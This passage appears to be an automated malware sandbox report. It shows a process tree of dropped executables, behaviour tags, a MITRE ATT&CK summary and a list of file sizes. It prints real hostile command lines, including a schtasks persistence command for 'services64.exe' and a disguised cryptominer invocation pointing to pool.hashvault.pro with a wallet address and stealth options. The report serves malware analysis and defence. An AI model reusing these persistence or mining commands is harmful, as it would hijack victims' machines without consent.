- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\3CD9.exeC:\Users\Admin\AppData\Local\Temp\3CD9.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\AF99.exeC:\Users\Admin\AppData\Local\Temp\AF99.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 2802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Local\Temp\BD94.exeC:\Users\Admin\AppData\Local\Temp\BD94.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\BD94.exeC:\Users\Admin\AppData\Local\Temp\BD94.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\6666.exe"C:\Users\Admin\AppData\Local\Temp\6666.exe"3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\6666.exe"4⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"6⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\services64.exeC:\Users\Admin\AppData\Local\Temp\services64.exe6⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵
-
-
-
C:\Windows\System32\conhost.exeC:\Windows/System32\conhost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45JpPqakEn7EwqkL6WB28DLDt58UcCNARMdsAGo6VGdfUByVDFtFCxrNBD7UhWSNvGQCjvLgahxNrMc3T7szAVfj2JW7Kyq --pass=666 --cpu-max-threads-hint=90 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-kill-targets="" --cinit-idle-wait=5 --cinit-idle-cpu=50 --cinit-stealth --cinit-kill8⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Haemotoxic.exe"C:\Users\Admin\AppData\Local\Temp\Haemotoxic.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\CDF1.exeC:\Users\Admin\AppData\Local\Temp\CDF1.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3728 -ip 37281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 5096 -ip 50961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 908 -ip 9081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 6420 -ip 64201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 6752 -ip 67521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2341F4F279D16B0F6E134055E2043726 C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EE776E91C036CDF00D7BD2FB760CEE642⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 38805C33BF34D7030C4D622A1F822AF3 E Global\MSI00002⤵
- Drops file in Windows directory
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6820 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 6820 -ip 68201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 4203⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 6420 -ip 64201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe cc6c8b923930ed971de306e7d61c01b5 daOiKgVPfUaRwyNH+IbtQg.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
2Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
-
Filesize
12.2MB
-
Filesize
12.2MB
-
Filesize
12.2MB
-
Filesize
12.2MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
864KB
-
Filesize
1.4MB
-
Filesize
6.1MB
-
Filesize
8KB
-
Filesize
500KB
-
Filesize
856KB
-
Filesize
36KB
-
Filesize
68KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
16KB
-
Filesize
6.1MB
-
Filesize
188KB
-
Filesize
112KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
500KB
-
Filesize
856KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
41.9MB
-
Filesize
316KB
-
Filesize
568KB
-
Filesize
41.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
1.3MB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
436KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
292KB
-
Filesize
8KB
-
Filesize
1.3MB
-
Filesize
36KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
192KB
-
Filesize
140KB
-
Filesize
8KB
-
Filesize
324KB
-
Filesize
576KB
-
Filesize
4KB
-
Filesize
420KB
-
Filesize
588KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
304KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
12KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
436KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
4KB